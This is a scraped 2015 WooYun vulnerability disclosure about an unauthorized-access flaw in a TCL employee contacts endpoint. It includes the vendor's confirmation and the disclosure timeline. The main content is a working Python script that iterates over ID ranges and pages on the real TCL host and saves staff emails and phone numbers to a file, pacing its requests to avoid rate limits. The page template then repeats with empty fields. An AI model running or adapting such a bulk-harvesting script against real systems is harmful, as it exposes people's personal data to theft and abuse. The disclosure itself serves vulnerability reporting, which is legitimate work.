我是如何获得TCL全部员工邮箱与电话的（附验证脚本）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0114754

漏洞标题：我是如何获得TCL全部员工邮箱与电话的（附验证脚本）

漏洞作者： MyKings

提交时间：2015-05-18 14:08

修复时间：2015-07-02 14:24

公开时间：2015-07-02 14:24

漏洞类型：未授权访问/权限绕过

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-18：细节已通知厂商并且等待厂商处理中
2015-05-18：厂商已经确认，细节仅向厂商公开
2015-05-28：细节向核心白帽子及相关领域专家公开
2015-06-07：细节向普通白帽子公开
2015-06-17：细节向实习白帽子公开
2015-07-02：细节向公众公开

简要描述：

一个系统查询接口存在未授权访问~

详细说明：

#!/usr/bin/env python
# coding: utf-8 
# pip install requests requests_ntlm
import requests
import re
import sys
import time
from requests_ntlm import HttpNtlmAuth
reload(sys)
sys.setdefaultencoding('utf-8')
PAGE_REGEX = re.compile(r'PageCount":.*(\d),')
def main(start_num, end_num):
    delay = 3
    delay_count = 100
    i = 0
    with open('tcl_account.txt','a') as f:
        for id in xrange(start_num, end_num):
            i += 1
            _url = "http://ep.tclcom.com/_layouts/TCL.EP.GPortal.UI/ashx/ContactsHander.ashx?method=query&maxItemCount=11&pageIndex=1&parentId=000%s" % id
            json, pagecount = get(_url)
            print _url
            f.write('%s\n%s\n' % (_url,json))
            if pagecount > 1:
                print '[*] found page size: %s' % pagecount
                for pageindex in range(2, pagecount+1):
                    page_url = _url.replace('pageIndex=1', 'pageIndex=%s' % pageindex)
                    print '[%s]' % pageindex, page_url
                    _json, _ = get(page_url)
                    f.write('%s\n%s\n' % (page_url, _json))
            if  i % delay_count == 0:
                time.sleep(delay)
                print '[-] delay %s(s)' % delay
   
def get(url):
    url = "%s&t=%s" % (url, time.time())
    result = ''
    pagecount = 1
    auth_nt = HttpNtlmAuth('user', '***')
    #req = requests.get(url=url, auth=auth_nt)
    req = requests.get(url=url, timeout=15)
    if req.status_code == 200:
        result = req.text     
        match = PAGE_REGEX.search(result)
        if match:
            pagecount = int(match.group(1))
    return (result, pagecount)
if __name__ == '__main__':
    main(84599, 87715)

支持分页抓取

漏洞证明：

http://ep.tclcom.com/_layouts/TCL.EP.GPortal.UI/ashx/ContactsHander.ashx?method=query&maxItemCount=11&pageIndex=1&parentId=00085221

修复方案：

添加权限~

版权声明：转载请注明来源 MyKings@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-05-18 14:23

厂商回复：

非常感谢您对我公司信息系统的帮助，将会转发给相应的同事跟进。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0114754

漏洞标题：我是如何获得TCL全部员工邮箱与电话的（附验证脚本）

相关厂商：TCL集团财务有限公司

漏洞作者： MyKings

提交时间：2015-05-18 14:08

修复时间：2015-07-02 14:24

公开时间：2015-07-02 14:24

漏洞类型：未授权访问/权限绕过

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 MyKings@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0114754

漏洞标题：我是如何获得TCL全部员工邮箱与电话的（附验证脚本）

相关厂商：TCL集团财务有限公司

漏洞作者： MyKings

提交时间：2015-05-18 14:08

修复时间：2015-07-02 14:24

公开时间：2015-07-02 14:24

漏洞类型：未授权访问/权限绕过

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0114754"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 MyKings@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：